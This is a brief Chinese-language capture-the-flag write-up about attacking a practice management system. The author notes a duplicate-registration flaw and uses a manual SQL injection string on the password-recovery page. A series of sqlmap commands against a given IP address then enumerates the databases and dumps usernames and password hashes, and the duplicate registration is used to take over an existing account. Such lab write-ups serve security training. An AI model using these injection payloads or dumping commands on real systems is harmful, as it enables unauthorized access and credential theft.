还是这一套管理系统,而这次能够点开的页面是登录和注册页面,如下
首先注册并登录发现
没有什么显著的效果,然后怀疑的是登录或者注册框存在sql注入漏洞,但是发现并没有,然而注册页面存在一个同用户名可以重复注册的漏洞
点击忘记密码可以引导到一个修改密码的页面
在这个页面尝试手工注入
'or 1=1#
发现可以注入
于是决定使用sqlmap在该页面进行注入
用我们刚注册的用户发送POST
sqlmap -u "http://220.249.52.133:56810/findpwd.php" --data "username=123" --dbs
发现几个数据库,其中cetc004应该就是当前云控中心的数据库
sqlmap -u "http://220.249.52.133:56810/findpwd.php" --data "username=123" -D cetc004 --tables
发现一个用户表,对其进行查看
sqlmap -u "http://220.249.52.133:56810/findpwd.php" --data "username=123" -D cetc004 -T user --columns
可以发现密保问题,密码,密保答案,用户名这几个字段,我们需要的就是用户名和密码这两项
sqlmap -u "http://220.249.52.133:56810/findpwd.php" --data "username=123" -D cetc004 -T user -C "username,password" --dump
发现了三个用户,其中1和123用户都是我刚刚注册的,密码都是1和123,这里发现密码都被加密过了(看别人的wp了解到是md5加密)
这里利用注册页面可以重复注册的漏洞,对原本存在的一个用户进行重复注册
flag见上
其它解法(插眼)